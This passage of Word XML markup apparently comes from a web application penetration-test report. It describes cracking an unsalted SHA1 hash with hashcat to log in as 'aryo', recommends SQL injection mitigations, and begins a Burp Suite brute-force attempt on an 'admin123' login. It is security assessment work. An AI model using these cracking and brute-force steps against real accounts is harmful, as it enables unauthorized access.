                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE8FF0" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1" w:rsidP="00B040D1"/>
    <w:p w14:paraId="2E45D27E" w14:textId="5428525D" w:rsidR="006F4B2E" w:rsidRDefault="006F4B2E" w:rsidP="00447E29">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>For this exploitation,</w:t>
      </w:r>
      <w:r w:rsidR="00160CB2">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="005B6507">
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="00160CB2">
        <w:t xml:space="preserve"> attempt into user account aryo will be performed</w:t>
      </w:r>
      <w:r>
        <w:t>. Using hashid to identify the hash type, it seems that the passwords were unsalted and hashed using SHA1.</w:t>
      </w:r>
      <w:r w:rsidR="002845FA" w:rsidRPr="002845FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15493A12" w14:textId="1DEA9F61" w:rsidR="001F0A6F" w:rsidRDefault="002845FA" w:rsidP="009B3EFE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658330" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43A58031" wp14:editId="5FA1106F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>123826</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>874395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="476250" cy="90488"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="236" name="Rectangle 236"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="476250" cy="904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15761D">
              <v:rect id="Rectangle 236" style="position:absolute;margin-left:9.75pt;margin-top:68.85pt;width:37.5pt;height:7.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B78F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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A450D86" wp14:editId="775B0337">
            <wp:extent cx="5664227" cy="1857375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946373" name="Picture 189463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73" name="Picture 18946373" descr="Tex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37616" b="63640"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5751929" cy="1886134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8B427" w14:textId="77777777" w:rsidR="009A2CA9" w:rsidRDefault="009A2CA9" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="166F525D" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5343E6" w14:textId="4E82FD2A" w:rsidR="008A3FF6" w:rsidRDefault="00447E29" w:rsidP="00447E29">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="008A3FF6">
        <w:t xml:space="preserve"> gain access, the password hash needs to be cracked. Hashcat is a powerful tool used for password cracking. It provides five unique modes of attack for over 300 highly optimized hashing algorithms. Using this tool, the hashed password was immediately cracked and revealed to be “123”.</w:t>
      </w:r>
      <w:r w:rsidR="0095506C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B0262">
        <w:t>This however requires a wordlist such as “rockyou.txt”</w:t>
      </w:r>
      <w:r w:rsidR="00791D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8A3FF6" w14:paraId="661C9FD0" w14:textId="77777777" w:rsidTr="008A3FF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E111818" w14:textId="1237216E" w:rsidR="008A3FF6" w:rsidRDefault="00E25DAD" w:rsidP="001F0A6F">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658333" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="745BF9AC" wp14:editId="611FB849">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-40005</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1768157</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1666875" cy="679767"/>
                      <wp:effectExtent l="0" t="0" r="28575" b="25400"/>
                      <wp:wrapNone/>
                      <wp:docPr id="239" name="Rectangle 239"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1666875" cy="6797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0DB459">
                    <v:rect id="Rectangle 239" style="position:absolute;margin-left:-3.15pt;margin-top:139.2pt;width:131.25pt;height:53.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64C3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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="008A3FF6">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A3C2B4" wp14:editId="1BF0A8CF">
                  <wp:extent cx="2697492" cy="2497015"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:docPr id="18946374" name="Picture 189463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74" name="Picture 18946374" descr="Text&#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39222"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2706453" cy="2505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0D63E30" w14:textId="6302B0AC" w:rsidR="008A3FF6" w:rsidRDefault="002845FA" w:rsidP="001F0A6F">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658331" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3925CF3D" wp14:editId="35E1D075">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-8890</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>361950</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2682240" cy="208280"/>
                      <wp:effectExtent l="0" t="0" r="22860" b="20320"/>
                      <wp:wrapNone/>
                      <wp:docPr id="237" name="Rectangle 237"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="2682240" cy="208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80FCD2">
                    <v:rect id="Rectangle 237" style="position:absolute;margin-left:-.7pt;margin-top:28.5pt;width:211.2pt;height:16.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57EE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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="008A3FF6">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CF55A02" wp14:editId="160859B8">
                  <wp:extent cx="2829330" cy="2446774"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="18946375" name="Picture 189463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75" name="Picture 18946375" descr="Graphical user interface, text, application&#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69987" b="53868"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2858268" cy="24717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0BD75F" w14:textId="0DC9CABA" w:rsidR="005F7C35" w:rsidRDefault="005F7C35">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76842544" w14:textId="6C3F1003" w:rsidR="00621FE1" w:rsidRDefault="00621FE1" w:rsidP="00BC1E52">
      <w:r>
        <w:t xml:space="preserve">Using “aryo” as the username and “123” as the password, </w:t>
      </w:r>
      <w:r w:rsidR="005B6507">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>logon attempt into account aryo was successful as seen below.</w:t>
      </w:r>
      <w:r w:rsidR="00CD32D9" w:rsidRPr="00CD32D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE36ECA" w14:textId="105BE7EE" w:rsidR="001F0A6F" w:rsidRDefault="00CD32D9" w:rsidP="001F0A6F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658334" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B92E1F7" wp14:editId="3E2B3A68">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5043488</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>393699</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="823912" cy="633413"/>
                <wp:effectExtent l="0" t="0" r="14605" b="14605"/>
                <wp:wrapNone/>
                <wp:docPr id="241" name="Rectangle 241"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="823912" cy="6334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7D242D">
              <v:rect id="Rectangle 241" style="position:absolute;margin-left:397.15pt;margin-top:31pt;width:64.85pt;height:49.9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C6D4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uvhAIAAGgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X20na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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="089485E7" wp14:editId="6F8296EA">
            <wp:extent cx="5943600" cy="1595438"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="18946377" name="Picture 189463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77" name="Picture 18946377" descr="Graphical user interface, website&#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52288"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1595438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="215C3052" w14:textId="39151B54" w:rsidR="00A9656C" w:rsidRDefault="00A9656C" w:rsidP="00A4354E"/>
    <w:p w14:paraId="6474232A" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc93487311"/>
      <w:bookmarkStart w:id="148" w:name="_Toc93502890"/>
      <w:bookmarkStart w:id="149" w:name="_Toc93526926"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8AFED6" w14:textId="47B7779A" w:rsidR="00170CA0" w:rsidRDefault="00170CA0" w:rsidP="00170CA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc94100257"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="148"/>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="1F1FA859" w14:textId="31231D6E" w:rsidR="00170CA0" w:rsidRDefault="00AF0F03" w:rsidP="00BC1E52">
      <w:r>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="7002DAAA">
        <w:t>injections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D762C1">
        <w:t>are o</w:t>
      </w:r>
      <w:r w:rsidR="005F0D17">
        <w:t xml:space="preserve">ne of </w:t>
      </w:r>
      <w:r w:rsidR="005B6507">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00392B4F">
        <w:t>most utilized attack scenarios used.</w:t>
      </w:r>
      <w:r w:rsidR="00E64396">
        <w:t xml:space="preserve"> There are</w:t>
      </w:r>
      <w:r w:rsidR="00422B7E">
        <w:t xml:space="preserve"> multiple mitigation methods that can be used to protect the web application from this vulnerability.</w:t>
      </w:r>
      <w:r w:rsidR="00F2594A">
        <w:t xml:space="preserve"> Firstly, </w:t>
      </w:r>
      <w:r w:rsidR="00B54E47">
        <w:t xml:space="preserve">the use of </w:t>
      </w:r>
      <w:r w:rsidR="00121D5A">
        <w:t>parameterized</w:t>
      </w:r>
      <w:r w:rsidR="00B54E47">
        <w:t xml:space="preserve"> queries </w:t>
      </w:r>
      <w:r w:rsidR="008D2123">
        <w:t xml:space="preserve">can enable the database to recognize the code and distinguish it from input data. The user input would be automatically quoted and </w:t>
      </w:r>
      <w:r w:rsidR="00C50D97">
        <w:t>would not allow the supplied in</w:t>
      </w:r>
      <w:r w:rsidR="0079542A">
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidR="00C50D97">
        <w:t xml:space="preserve"> to be executed.</w:t>
      </w:r>
      <w:r w:rsidR="00F9626A">
        <w:t xml:space="preserve"> Another recommendation is to implement stored procedures </w:t>
      </w:r>
      <w:r w:rsidR="0003710F">
        <w:t>in the database</w:t>
      </w:r>
      <w:r w:rsidR="006910F3">
        <w:t xml:space="preserve"> which</w:t>
      </w:r>
      <w:r w:rsidR="002C5E5A">
        <w:t xml:space="preserve"> is another method </w:t>
      </w:r>
      <w:r w:rsidR="004D5505">
        <w:t xml:space="preserve">to automatically </w:t>
      </w:r>
      <w:r w:rsidR="00121D5A">
        <w:t>paramet</w:t>
      </w:r>
      <w:r w:rsidR="00C71752">
        <w:t>erize</w:t>
      </w:r>
      <w:r w:rsidR="004D5505">
        <w:t xml:space="preserve"> queries.</w:t>
      </w:r>
      <w:r w:rsidR="00660636">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008615C8">
        <w:t xml:space="preserve">Lastly, </w:t>
      </w:r>
      <w:r w:rsidR="003071C1">
        <w:t xml:space="preserve">the usage of character-escaping functions for user-supplied input </w:t>
      </w:r>
      <w:r w:rsidR="00F16F25">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00E075C9">
        <w:t xml:space="preserve">ensure that the database never confuses </w:t>
      </w:r>
      <w:r w:rsidR="00B2383F">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005F3E6B">
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="00B2383F">
        <w:t xml:space="preserve"> with the SQL statement provided by the developer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6957F8" w14:textId="321F6DEA" w:rsidR="00C77F99" w:rsidRDefault="00C77F99">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc93487312"/>
      <w:bookmarkStart w:id="152" w:name="_Toc93502891"/>
      <w:bookmarkStart w:id="153" w:name="_Toc93526927"/>
    </w:p>
    <w:p w14:paraId="037AF1E5" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A0D88" w14:textId="5675E264" w:rsidR="004B3BE5" w:rsidRDefault="00103AF6" w:rsidP="004B3BE5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc94100258"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Broken Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
      <w:bookmarkEnd w:id="152"/>
      <w:bookmarkEnd w:id="153"/>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="3F65DD43" w14:textId="43502C39" w:rsidR="007E3E62" w:rsidRPr="007E3E62" w:rsidRDefault="007E3E62" w:rsidP="007E3E62">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4678CAEB" w14:textId="71A306E7" w:rsidR="009C5C98" w:rsidRDefault="009C5C98" w:rsidP="009C5C98">
      <w:r>
        <w:t xml:space="preserve">Broken authentication occurs when there is insufficient session or credential management or both. Credential management is where user credentials are managed such as restricting and allowing users to login </w:t>
      </w:r>
      <w:r w:rsidR="00C71752">
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the account. By utilizing tools available online, an attacker can brute force the login page to gain unauthorized access into the user account. Moreover, due to insufficient logging and monitoring, the attack was undetected. This vulnerability affects the organization’s management and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106808D6" w14:textId="12561BDA" w:rsidR="00D314EA" w:rsidRPr="00DA6DAA" w:rsidRDefault="00641C85" w:rsidP="00BC1E52">
      <w:r>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve"> this </w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00745F77">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve"> attempt to brute force a user’s account in this case an employer </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve">who </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">most </w:t>
      </w:r>
      <w:r w:rsidR="00B90FD7">
        <w:t>definitely</w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0977F72E">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B90FD7">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve"> higher </w:t>
      </w:r>
      <w:r w:rsidR="003A75A3">
        <w:t>privilege</w:t>
      </w:r>
      <w:r w:rsidR="00A91048">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve"> making the user account a target for </w:t>
      </w:r>
      <w:r w:rsidR="00745F77">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve">exploit. </w:t>
      </w:r>
      <w:r w:rsidR="00577205">
        <w:t>In this exploit</w:t>
      </w:r>
      <w:r w:rsidR="00745F77">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00577205">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A75A3">
        <w:t>it is made</w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t xml:space="preserve"> aware that </w:t>
      </w:r>
      <w:r w:rsidR="00745F77">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D314EA">
        <w:t>username for the Employer is ‘admin123’</w:t>
      </w:r>
      <w:r w:rsidR="00E3709C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7105D79B" w14:textId="507F2B7C" w:rsidR="00572FAD" w:rsidRDefault="00912F68" w:rsidP="00E85300">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="617FC6EC" wp14:editId="21E4925F">
            <wp:extent cx="5842382" cy="3286664"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="18946378" name="Picture 189463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70805" cy="3302654"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E850C9B" w14:textId="77777777" w:rsidR="00E85300" w:rsidRDefault="00E85300">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BFC781" w14:textId="41210CF9" w:rsidR="00912F68" w:rsidRDefault="00912F68" w:rsidP="00BC1E52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">For this </w:t>
      </w:r>
      <w:r w:rsidR="0077559D">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xploit that is to be carried out, Burp suite Community edition was used with configured proxy. Before beginning an attack, </w:t>
      </w:r>
      <w:r w:rsidR="001E5135">
        <w:t>an understanding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of how the login request is structured in its layout</w:t>
      </w:r>
      <w:r w:rsidR="002E36A9">
        <w:t xml:space="preserve"> is required</w:t>
      </w:r>
      <w:r>
        <w:t>. To do so</w:t>
      </w:r>
      <w:r w:rsidR="0034055F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="006B6424">
        <w:t>login attempt</w:t>
      </w:r>
      <w:r w:rsidR="00250EA2">
        <w:t xml:space="preserve"> from</w:t>
      </w:r>
      <w:r w:rsidR="00E3709C">
        <w:t xml:space="preserve"> the employer’s </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r w:rsidR="00E3709C">
        <w:t>page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00651DF3">
        <w:t>to capture the request is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C453D" w14:textId="37C8C840" w:rsidR="001656AA" w:rsidRDefault="00912F68" w:rsidP="00BC1E52">
      <w:r>
        <w:t>After the request is intercepted</w:t>
      </w:r>
      <w:r w:rsidR="006B6424">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it can be understood th</w:t>
      </w:r>
      <w:r w:rsidR="002866AE">
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">there </w:t>
      </w:r>
      <w:r w:rsidR="00745F77">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> username and password input fields at the bottom.</w:t>
      </w:r>
      <w:r w:rsidR="002F6678">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001656AA">
        <w:t>The password field highlighted at the bottom is where the payload to brute force login attempt</w:t>
      </w:r>
      <w:r w:rsidR="00A2111B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="001656AA">
        <w:t xml:space="preserve"> will be carried out.</w:t>
      </w:r>
      <w:r w:rsidR="004F56B2">
        <w:t xml:space="preserve"> In this case,</w:t>
      </w:r>
      <w:r w:rsidR="003F5364">
        <w:t xml:space="preserve"> the password </w:t>
      </w:r>
      <w:r w:rsidR="00745F77">
        <w:t>placeholder</w:t>
      </w:r>
      <w:r w:rsidR="00EE321F">
        <w:t xml:space="preserve"> containing “PASSWORD” would be substituted with</w:t>
      </w:r>
      <w:r w:rsidR="004F56B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00745F77">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="004F56B2">
        <w:t xml:space="preserve">list of possible </w:t>
      </w:r>
      <w:r w:rsidR="00EE321F">
        <w:t>passwords.</w:t>
      </w:r>
      <w:r w:rsidR="009C23B4" w:rsidRPr="009C23B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283EC558" w14:textId="669ED2FE" w:rsidR="00912F68" w:rsidRDefault="009C23B4" w:rsidP="00912F68">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658335" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72AFC095" wp14:editId="764F062E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>172720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1704340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1082040" cy="111760"/>
                <wp:effectExtent l="0" t="0" r="22860" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="242" name="Rectangle 242"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
